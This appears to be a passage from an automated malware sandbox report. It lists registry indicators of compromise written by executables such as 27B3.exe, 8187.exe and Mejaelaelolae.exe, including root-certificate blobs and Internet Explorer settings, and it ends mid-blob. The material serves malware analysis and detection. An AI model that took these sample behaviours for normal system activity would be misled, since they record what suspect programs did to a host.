\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "332604760" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10de2e40cd74d701 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4CFBE9A1-E0BF-11EB-9A32-C670C171E3F2} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online\NumberOfSubdomains = "1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online\Total = "18" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" 27B3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" 27B3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs 27B3.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mejaelaelolae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mejaelaelolae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 27B3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 27B3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 8187.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde 8187.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Mejaelaelolae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4